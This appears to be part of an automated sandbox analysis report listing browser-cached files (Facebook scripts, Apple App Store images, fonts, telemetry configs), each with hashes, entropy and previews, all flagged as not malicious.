                                                                                                                                                                                                                                Preview:RIFF4...WEBPVP8X..............VP8L..../..2.M.l.n.`-...u0...K..|G.....~....q...:..,...2...E.C..o...8.~.........../8..C....!.......C. .d..P.XK..0.....@.3A......@.)``.m..vT..(Pn..,.%..6.b..u...f.....7|.~SO.)....vS.z?..u/..3f...r.Z..-}=.2.w.^........R...f...R...~G....T.k..r....>.^.rJ..].....y.S.....lK.X.U..\=4..w+.Y.).._.;.......^*D.....9...ms[I.B..1..lLQ..=9..t5+.%...*.l.0.0B.BP.mm.<.$3......Y....d...N"...O..o.P......<..]....:!..4.B........*......>.L._..wUwUw......._...._6+..W.~..6.|.u.....gz.L....Wz.L.|...z.B.|.?.Z>.]U.KK...^$;.....P......^>..g*..3E.}..^..'....Z>...k.I.Y%%Y.,.,.....VV.@......*..=.....@f./.X..=....;....s......@.....<. ...@..L.....W`.r..q.q.8........d$.@AF62 ..@ #...^.2.Q....@<....p....8h..)...<..M....@.....#..2............OW&.3......T..*R.......w.f....P...P...".....Y.^4.1..O...z..@.#0..;6.......;<<..|.....q...\..[...*B.#..../.#...m}nT..g. .' ....rZ.i....U.gE.XzJ.[<.t5s..j....9.|..Sl...8.7.....}w..]v.........~..VM.%.a0..q..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (3256)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):30189
                                                                                                                                                                                                                                Entropy (8bit):5.396190125614001
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:kAEuymY99x3Yx9YXMAuzwqxaf4XByCL0xkc:P3i37T7FQ0CL0xp
                                                                                                                                                                                                                                MD5:56B7FCA02CFACE9E71C2AE38EB25AFE1
                                                                                                                                                                                                                                SHA1:D7A4B3ADAE9B1619379EFE66711B2DAC7B3F8F45
                                                                                                                                                                                                                                SHA-256:0D410C6C2E55A84B012837257DD6239044DB1621E0F6DE52EA4E332E898F8E34
                                                                                                                                                                                                                                SHA-512:EE93C53CAA66B8176631F44507B5A7FE7130093CD4EBB6083CB8866703E39030CEE10C97EF9E993FBD589F77F3FAFF3405C738289D7BD67D44E5E17F2BFDD038
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("LynxGeneration",["LinkshimHandlerConfig","URI"],(function(a,b,c,d,e,f,g){var h,i=new(h||(h=c("URI")))(c("LinkshimHandlerConfig").linkshim_path).setDomain(c("LinkshimHandlerConfig").linkshim_host),j={getShimURI:function(){return new(h||(h=c("URI")))(i)},getLynxURIProtocol:function(a){return c("LinkshimHandlerConfig").always_use_https?"https":a.getProtocol()==="http"?"http":"https"},getShimmedHref:function(a,b,d){var e;a=new(h||(h=c("URI")))(a);var f=j.getLynxURIProtocol(a);a=j.getShimURI().setQueryData((e={},e[c("LinkshimHandlerConfig").linkshim_url_param]=a.toString(),e[c("LinkshimHandlerConfig").linkshim_enc_param]=b,e)).setProtocol(f);b=d==null?void 0:d.trackingNodes;e=d==null?void 0:d.callbacks;b&&b.length&&(a=a.addQueryData("__tn__",b.join("")));e&&e.length&&(a=a.addQueryData("c",e));return a}};a=j;g["default"]=a}),98);.__d("NonFBLinkReferrerProtector",["$","LinkshimHandlerConfig","Parent","URI","cr:5662","setTimeout"],(function(a,b,c,d,e,f){"use strict";var
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):384
                                                                                                                                                                                                                                Entropy (8bit):7.211115598249117
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:6v/lhPop3MRdOU5jtcHFVi9UWlJf4/XIv95niy+x1pbbIqongIh4qwkldp:6v/7gp3Mdb5julpKJKXnVfRXqwk9
                                                                                                                                                                                                                                MD5:EF829389986B47AEE6E88F5278FA1C3D
                                                                                                                                                                                                                                SHA1:183597E1358469FF362F1EA1CA56248C83DD63F1
                                                                                                                                                                                                                                SHA-256:CD9D725F192DCCB71981BDF97E01EA6E8E9D396EF10990B7F2F12061EDE1E71C
                                                                                                                                                                                                                                SHA-512:EEDCB50663B086F5E3B22557C0167C039885D6B632A61D8E3A424E1209FEB0F3A018DC57892BF36DE9CBE5286BB4FEA8B5FB2566A858E4F4D1FA3F30C9F744A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/button_glyphs/video_control_fullscreen_white-ef829389986b47aee6e88f5278fa1c3d.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............sRGB........:IDATX...OJ.q.../c.B.g6.......^...)\.......E.CT.H4].i.W.....=.. ...04I.......5E.`.....1....'..iqE$/.{."ol........s.<bR..)R.......)C.X^0..Pe......l.(G.1&.,.<..O.-.L0m..u&.....e.8....;.:..X...:...5m..g..<P&..).-...A..3......)f...9..A.y.D..<. .<R`NF..2.ty'#oTxb...qI...'..&/<c.|...L>(../...a.o3.... ...|....'|.~w....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2634)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9946
                                                                                                                                                                                                                                Entropy (8bit):5.303383252274076
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:NdbWsWxwiKpBpVyPPjg9bt9MVzclvs4oRL19n3kufDi/9secuFjel:LbWsWx3KDXR9THl1iL1l3kufG/9sebjS
                                                                                                                                                                                                                                MD5:9BB28E4E947B15C91F9178EFF5B23264
                                                                                                                                                                                                                                SHA1:87F5AC3AE29A7455DD00F79435B1D91F664F0395
                                                                                                                                                                                                                                SHA-256:9FEC8921027F561C8BD0FDF17C244E35F26ABA8E336571597FCCCD9D42D7A0CA
                                                                                                                                                                                                                                SHA-512:4566D611CDC37D0F4C34D36ABA45AF69036C4A9E155FAAEC80D70B20C24555A319C8227377D9AA7E7EF02077C2E83C050DB8BACCDBF48417D8772F64818AA7A5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[722],{32722:function(e,t,i){var n=i(24178),r=i(76588),o=n.SC.attachDelegate,s={setDelegate:function(e){return o(this,e)},localStorageObject:n.tO.localStorageObject,sessionStorageObject:n.tO.sessionStorageObject},a=n.SC.attachDelegate,c={setDelegate:function(e){return a(this,e)},makeAjaxRequest:n.L5.makeAjaxRequest},l=n.SC.attachDelegate,u=n.SC.hasAnyKeys,p=n.SC.isArray,h=n.tO.saveObjectToStorage,d=n.tO.objectFromStorage,g=n.P0.exponentialBackoff,f=n.EE.valueForKeyPath,S="noTopicConfig",v={blacklistedFields:["capacitySystem","capacitySystemAvailable","capacityDisk","capacityData","capacityDataAvailable"],compoundSeparator:"_",configBaseUrl:"https://xp.apple.com/config/1/report",constraints:{profiles:{AMPWeb:{precedenceOrderedRules:[{filters:"any",fieldConstraints:{clientId:{generateValue:!0,namespace:"AMPWeb_isSignedOut",expirationPeriod:864e5}}},{filters:{valueMatches:{isSignedIn:[!0]}},
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text, with very long lines (326)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):7835
                                                                                                                                                                                                                                Entropy (8bit):5.7037022399580755
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:wfB/5+dzPThTETLTf6LIErhvEpLAQAtuUs59BbLnSXGAxF:wfN5QfdenfAMuH0XkF
                                                                                                                                                                                                                                MD5:2929F5A19DF395677697F7E2390B7FB1
                                                                                                                                                                                                                                SHA1:590DDA6F95DDE4F554323144FC0BB9DBF5AA26FA
                                                                                                                                                                                                                                SHA-256:DBA7DBBDB20E1C8DC044C571D1F9327F2BE09C3B11650EB6F8D7BFD3A431E189
                                                                                                                                                                                                                                SHA-512:A109107075813C58669C266F9EB601A5C39F497C5EBD46D776D812D56E7920EDFF1B03CCCFA3D6C36F3F9AE8A35CE4C6AA7100F843CE0F9B9EBE66D94185602A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/af/e7/92/afe79244-897a-982a-4b1a-72594198bffa/P875466468_default.m3u8
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-VERSION:7.#EXT-X-INDEPENDENT-SEGMENTS..#-- en (3) --.#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-HE2-stereo-32",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/1d/b1/35/1db13506-dfce-582e-6daa-09ae6735af46/P875466468_Anull_audio_en_gr32_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-64",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/38/7d/6c/387d6c85-7c78-ffab-d933-df87a038d9f9/P875466468_Anull_audio_en_gr64_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-128",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2.m3u8"..#EXT-X-I-FRAME-STREAM-INF:AVERAGE-BANDWIDTH=190609,_AVG-BANDWIDT
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2549
                                                                                                                                                                                                                                Entropy (8bit):4.065824216102575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:t4tQ6dEHu+4CE/EiFyCmxOJLGe1sxmJLOTyX3WCQ9yCmxOJLA5J2z5D6M9JMPxg0:WiE/yCmr9hj9mP0kOpFnqo7gX
                                                                                                                                                                                                                                MD5:ECD94021D2C853C3B8DEB8203BA17300
                                                                                                                                                                                                                                SHA1:6F0E24BAF66AE386041E8FAF42363418A4C96144
                                                                                                                                                                                                                                SHA-256:0D6F8D206A6BD8B60A2048A3DF206AC956A2F633786E4AF1C02057F81758AD7A
                                                                                                                                                                                                                                SHA-512:1967613484EB4FB2A50628CCED684C3E1022D1DF51D5AA86ADE53828DBDF0A748A8E99669C08EC5A9AA4BA97DC74F709AD4798BF486C1BAEEC60D24B223E5D50
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360">. <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.82Zm-67.988-105.261c-32.728 0-55.455 22.013-55.455 53.929s22.727 53.929 55.455 53.929c32.727 0 55.455-22.013 55.455-53.929s-22.728-53.929-55.455-53.929Zm0 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-119.807-82.728c-32.727 0-55.455 22.013-55.455 53.929s22.728 53.929 55.455 53.929c32.728 0 55.455-22.013 55.455-53.929s-22.727-53.929-55.455-53.929Zm0 82.728c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.389 28.799-25.552 28.799Zm-112.826-82.728c-13.636 0-24.935 5.357-32.013 15.162v-65.585l-29.513 3.831v151.82h26.169l.519-15.844c6.981 11.818 19.481 18.474 34.838 18.474 27.988 0 48.475-22.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5264)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):19109
                                                                                                                                                                                                                                Entropy (8bit):5.306733844584032
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:mAjHWQIcLvvbeje34p4SFimdh/nWrQ8ekgtocqS04ZrahU6M/MhlxvXyYHYadMIE:Riiqi3QFiuPkg7qaZWhBMOlxvXVo
                                                                                                                                                                                                                                MD5:89EB93272AB81EA04A7890E1F270EB00
                                                                                                                                                                                                                                SHA1:42DBDAF298DE10D9B4304C2407EFA15B66BBE38C
                                                                                                                                                                                                                                SHA-256:EB4942819765B3C2D89FDB417F002D6002D07677F33682D6AFA93C45D0C4A020
                                                                                                                                                                                                                                SHA-512:05F688EDF1444E15ABFDD4469667BE4835D99A54D062B165AD5D94261E3ABD3EE4F59E7B0A53A0E341D2704D2F6675EEB10E42570E671871C72240B380E16D22
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsALSurfaceMessagePlugin",["feature"],(function(a,b,c,d,e,f,g){"use strict";function a(){var b=babelHelpers.taggedTemplateLiteralLoose(["ABPInfra_DeliveryProducts_Guidance"]);a=function(){return b};return b}b={type:"alSurface",key:"msg",logKey:"msg",feature:d("feature").feature(a())};c=b;g["default"]=c}),98);.__d("AdsALMessageSurface.react",["AdsALSubsurface","AdsALSurfaceConditional","AdsALSurfaceMessagePlugin","react"],(function(a,b,c,d,e,f,g){"use strict";var h;h||d("react");a=function(a){var b=a.children,e=a.moduleId;a=babelHelpers.objectWithoutPropertiesLoose(a,["children","moduleId"]);return c("AdsALSurfaceConditional")(babelHelpers["extends"]({surface:c("AdsALSurfaceMessagePlugin"),subsurface:d("AdsALSubsurface").getDynamicSubsurface(e.replace(".react",""))},a,{capability:babelHelpers["extends"]({},a.capability,{trackVisibilityThreshold:.5})}))(b)};g.AdsALMessageSurface=a}),98);.__d("AdsInterfacesRouteBuilder",["ifRequired","performanceNow"],(function(a,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1158
                                                                                                                                                                                                                                Entropy (8bit):7.642696531716287
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Autz6/Ko3ZGUMqrN+fIvaEYmFr1fTheqMlbryyFIqVhdfVSGCJ1:AuloNhCItxFr1fQq8brzIifQrJ1
                                                                                                                                                                                                                                MD5:F024DE5B9DC872D1D28CCCE031ED6475
                                                                                                                                                                                                                                SHA1:F7021999034C71C9DA1B42FC9ED6BB347F500F14
                                                                                                                                                                                                                                SHA-256:32AE71600E0F6B7F5A451AC8FF825A225731F1F1A21C54F3ACB35ED69368953B
                                                                                                                                                                                                                                SHA-512:7F6D5E78DE7E52839C542FB377A14332B71AC29E1EEC93678C78D1F9497B02C25C8A95E625709FEF693E9A2D253ED70D075A27CF8FBBA72B346E688ABDF64117
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF~...WEBPVP8X..............VP8 .........*....>.H.G.$!.I<<D.D..........,.*..S.?o.P.g..~.z.z?.].U...i..b.YjDm...{.a...+.#.+...b.........WeZ..F....w.;.U..A.v..G.0...e.b........Vo.......]G..n..=..'<.'...K.L....m.i...`)....t'h2.....OG.KK..r.....v[.jV.%..}.............9....V.e@gw..f..;"......\...U`h.i5..F~..>qCH.w.U.qm4......7... "....b.t.M6t..~Q.|.....&D9..p.....=H....X..r....o..10f.kD..?.+.R+1..7Z..)v.&h...P&..j.../..ib.....?D..u.....o..........b4....j.G&}.\.6~^..F.O.M#.]..?M...|R.7.X..w..C.Ea..)...?D..a.T..Mt..t............M1.'.|9...%..3\.uv..^;..Z9....."......?.#.>$....F.xV...1g.'.dL....*.Y.|.ck..*..4GR.....LV.Ds..}T....I1)X}q...g.\u.e..>.#7..{...."..@.....K..!o.....b.....)........7.Q.0&-4.....B..@0.&.z..*.z.T..fN3.].....P7...[?...N:w%.*@.bA[.\.W...3.pN.=6'.Y.gZto1= (..b.C..~i8Q9.P.W.i.Bh.!..F.k..T../...h.N:E*..BU.^.......p>.F.6.?.TB...idX.k...w..Q.p...A....L.....|.ST1.H........y2..7m...:..../....V..T....h0..RWFa...!.D....L.f...>...D...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 9832, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9832
                                                                                                                                                                                                                                Entropy (8bit):7.976940929423749
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:9+c1c2hRHfRMykrL1gCCSaxwEpY00OsMwpEmPScd3pLauSg+IaWuY9:9t1c278H1bOxzYZLTpEgScd5LauT9
                                                                                                                                                                                                                                MD5:EFE937997E08E15B056A3643E2734636
                                                                                                                                                                                                                                SHA1:D02DECBF472A0928B054CC8E4B13684539A913DB
                                                                                                                                                                                                                                SHA-256:53F2931D978BF9B24D43B5D556ECF315A6B3F089699C5BA3A954C4DDE8663361
                                                                                                                                                                                                                                SHA-512:721C903E06F00840140ED5EEC06329221A2731EFC483E025043675B1F070B03A544F8EB153B63CD981494379A9E975F014B57C286596B6F988CEE1AAF04A8C65
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu5mxKOzY.woff2
                                                                                                                                                                                                                                Preview:wOF2......&h......[8..&..........................j..V.6.`....T..<.....l.D........6.$.... ..t. ..I..Q.......!z.OQ.,..(J.......8.!.>P..E.\Q..DqA.SF...8.5kfZ?...2.6.mnX.(...&Knh....X\...}?{../n.@."....|.$....(.+.\=Bc...Dka.=.."..6......~ro.....a~>7..$..+.I..#.4.$.....d..3..]=.....fr8.}l....'C0.kT.DI.x%.....<H..i....u.....v.{..E5..D".........-.V.Z..K.RP..O.......6...@.x...@.....d.n.....Om..........#..s..4.....+....P&...V...>.|L......`Iw......C8..T.5.0|}....._?......&V..N..p....D..\.7q.gY:II.@....D.....Y.._.w!...~...Q!$...*.so|..W.l.. .|...\.w3...t..v....>>A.(p.Aq."%'J.&$......Q.....)...rQ...-.-.....EY..H..^.Fne..=Gb......Z..k..D<.<..x..e9...."...v.......`d..../$ ..S.i..i......7..6..2.Y.... .0........F......;.P.o'..........h......l... .0...3.[.`.C]^(....Oy..+:.3<.,=...../...\?QU.K..*}NfL.J.*=....m..d..Zs..g.<.+......j.j./..fbaec.....A....V.V.z..5i.U....[.>......6k.EI)KV.Y.)#k.=...;.....([.\..'...6".E...hC..u.>..........'.iT.....c.[w... .N...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6078)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9845
                                                                                                                                                                                                                                Entropy (8bit):5.240704384788954
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:zbSDfbbLJTpAX1lsfzNcRMtuzibSDLp1nmtNgb8JzGHzCrKI3qPMc33wBgxOxPHo:z2fbPJu1lsfzNcRg2i27nmtNgolG3XZh
                                                                                                                                                                                                                                MD5:7A5CAC4380406D9DF2E192904976505F
                                                                                                                                                                                                                                SHA1:8F2A83E30BB8C97954B6941E22E91418E16DCD6F
                                                                                                                                                                                                                                SHA-256:C2F0A7C478DBE90FCD594DB0A07442A9802DBBDF3FCA00F4DCDD8F3052879EEF
                                                                                                                                                                                                                                SHA-512:54F3DA732B64E5B1743A75A96B19398AAB933823E7D8E9F98FC700EB2444BF4EAAF82A7CD463F0F29389DC63494A799A072307B4BCBA8D70351319ECB2257216
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("EmojiRendererData",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(){}a.isEmoji=function(a){return a>983041||a<35?!1:a===35||a===42||a>=48&&a<=57||a===169||a===174||a===8205||a===8252||a===8265||a===8419||a===8482||a===8505||a>=8596&&a<=8601||a>=8617&&a<=8618||a>=8986&&a<=8987||a===9e3||a===9167||a>=9193&&a<=9203||a>=9208&&a<=9210||a===9410||a>=9642&&a<=9643||a===9654||a===9664||a>=9723&&a<=9726||a>=9728&&a<=9732||a===9742||a===9745||a>=9748&&a<=9749||a===9752||a===9760||a>=9762&&a<=9763||a===9766||a===9770||a>=9774&&a<=9775||a>=9784&&a<=9786||a===9792||a===9794||a>=9800&&a<=9811||a>=9823&&a<=9824||a===9827||a>=9829&&a<=9830||a===9832||a===9851||a>=9854&&a<=9855||a>=9874&&a<=9879||a===9881||a>=9883&&a<=9884||a>=9888&&a<=9889||a===9895||a>=9898&&a<=9899||a>=9904&&a<=9905||a>=9917&&a<=9918||a>=9924&&a<=9925||a===9928||a>=9934&&a<=9935||a===9937||a>=9939&&a<=9940||a>=9961&&a<=9962||a>=9968&&a<=9973||a>=9975&&a<=9976||a===9978||a===9981||a===9986||a==
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):588
                                                                                                                                                                                                                                Entropy (8bit):4.891214981444774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:tc9ptxMwllHVjfiva4/ZPdtIdLbPYovbIdMP1g1IdO2d4IdOPizL:tc9ptxMwllHVLT4/ZP0xPYSsKP1gC42V
                                                                                                                                                                                                                                MD5:EC0707C56BC834ADF5DD504C555D4982
                                                                                                                                                                                                                                SHA1:B04EB2CC743F5E5E2BC4B351099BE50020EAA53C
                                                                                                                                                                                                                                SHA-256:4E1DB999FEC000326552BE3E141AF46AEC9B23664ECF9B41E831089E5DF0E4FC
                                                                                                                                                                                                                                SHA-512:D27F3CBB4FEFE2A3C538EF94EA5CC568423BD98AE3361B45F7E47EAC98D318DB741D08344B5EE64DC492989486C62925847043E72AC4CDE54C96B279F4536BE6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/images/five-star-rating-gray-ec0707c56bc834adf5dd504c555d4982.svg
                                                                                                                                                                                                                                Preview:<svg viewBox="0 0 125 23" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill-rule="evenodd" stroke-linejoin="round" stroke-miterlimit="1.41" clip-rule="evenodd"><path fill="#8e8e93" d="M113.5 0L110 9h-8l6.63 4.88-2.62 9.12 7.5-6 7.5 6-2.63-9.13L125.01 9h-8l-3.5-9zM88 0l-3.5 9h-8l6.62 4.88L80.5 23l7.5-6 7.5 6-2.63-9.13L99.5 9h-8L88 0zM62.49 0l-3.5 9h-8l6.62 4.88L55 23l7.5-6 7.5 6-2.63-9.13L74 9h-8l-3.5-9zM36.97 0l-3.5 9h-8l6.63 4.88L29.47 23l7.5-6 7.5 6-2.62-9.13L48.47 9h-8l-3.5-9zM11.46 0l-3.5 9h-8l6.63 4.88L3.96 23l7.5-6 7.5 6-2.62-9.13L22.96 9h-8l-3.5-9z"/></svg>.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1927)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):11218
                                                                                                                                                                                                                                Entropy (8bit):5.35617324679183
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:bZWIlwG1Iv5QxUOcQRtPnIa0qVNAb2x5iUidJeJLFiNxFxSfILsBb5dl2V3iSkF:b0IT1IBOcQzvIapNAqfh+H2ILsBNPcRC
                                                                                                                                                                                                                                MD5:E8B8ED410D52E42957CD5EFBB2DA24BB
                                                                                                                                                                                                                                SHA1:84B2A4C493C53885B1BCC5B4C4B9DAED491EBC8C
                                                                                                                                                                                                                                SHA-256:F298D601608D58AFC41EF27D61D9D250028C976FC185A746DAD0A6544E880A5C
                                                                                                                                                                                                                                SHA-512:6F1E24B1B82F7F1BF32F53D20DAA9C7137C9DE73F1761369056B6F04065BE2AC0FEAB0CA5FEE960589AC9098AEEB82960BD866C8BF7CE83662C40EC8C3FE1CA8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/udpNONeEc85.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("TrustedTypesGoogleAnalyticsScriptURLPolicy",["TrustedTypes","err"],(function(a,b,c,d,e,f,g){"use strict";a={createScriptURL:function(a){if(a==="https://www.google-analytics.com/analytics.js"||a.includes("https://www.googletagmanager.com/gtag/js"))return a;throw c("err")("Violating Trusted Type policies. Provided URI (%s) is not equal to https://www.google-analytics.com/analytics.js or https://www.googletagmanager.com/gtag/js",a)}};b=c("TrustedTypes").createPolicy("google-analytics-url",a);d=b;g["default"]=d}),98);.__d("GoogleAnalytics4Setup",["DeferredCookie","ODS","TrustedTypesGoogleAnalyticsScriptURLPolicy","WebStorage"],(function(a,b,c,d,e,f,g){"use strict";var h,i;function j(){var a=(i||(i=c("WebStorage"))).getLocalStorageForRead();if(a==null){(h||(h=d("ODS"))).bumpEntityKey(6413,"cookies","google_analytics4.localStorage.read.fail");return null}return a.getItem("ga4_client_id")}function k(a){var b=(i||(i=c("WebStorage"))).getLocalStorage();if(b==null){(h||(h
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):733
                                                                                                                                                                                                                                Entropy (8bit):4.7574006224426535
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:YGKzFDsip968DDp8MIfE1lI11I1581f58zrF8qWKxk8IV5wDKOBuGpQJNGzF/BQU:YdxDsinqMIqlI3I1y1fyzr+jcdD9J+Sn
                                                                                                                                                                                                                                MD5:CC64BFA00B4B3FF916A983A0C27DEA58
                                                                                                                                                                                                                                SHA1:62452E81D49DF7E3EDAE74AE32A3E9A613DCFE86
                                                                                                                                                                                                                                SHA-256:67CB92C8D3E193BCAC15DEBC8CC34C5D2CE531C9A13D037EBFECDC662679215A
                                                                                                                                                                                                                                SHA-512:C6D1D59F4D354EF39AA6D59002D23AB6AEA977CC3B68FE9A6D0821FC0C6EE279390A35B8DB2E7E8D39C913694811CEF04763452D8075C63722700E2B5120F3EC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://xp.apple.com/config/1/report/xp_amp_appstore_perf
                                                                                                                                                                                                                                Preview:{"compoundSeparator":"_","fieldsMap":{"loadUrl":{"timestampFields":{"fetchStartTime":["fetchStart"],"domainLookupStartTime":["domainLookupStart"],"domainLookupEndTime":["domainLookupEnd"],"connectionStartTime":["connectStart"],"connectionEndTime":["connectEnd"],"secureConnectionStartTime":["secureConnectionStart"],"requestStartTime":["requestStart"],"responseStartTime":["responseStart"],"responseEndTime":["responseEnd"]},"otherFields":{"requestUrl":["name"],"transferSize":["transferSize"]}}},"metricsUrl":"https://xp.apple.com/report","performance":{"samplingPercentage":0.25,"samplingPercentageUsers":0.25,"sessionDuration":60000,"samplingPercentageUsersPageRender":0.25,"sessionDurationPageRender":60000},"postFrequency":5000}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12903)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):267078
                                                                                                                                                                                                                                Entropy (8bit):5.77863921462322
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9DX863Qv0GcAi54oUrdLLqEr0eFSol7CwZFjdtungZHZDRjG8BPI6SCe4Y9shOKl:tX863Qv0GcTNUrdLLqEr0eFSWFtungZR
                                                                                                                                                                                                                                MD5:571E845C97451949CFD2F8C0F8A01694
                                                                                                                                                                                                                                SHA1:C18EE01607A9F06ADD3CAF55951A8E6F7C48DD25
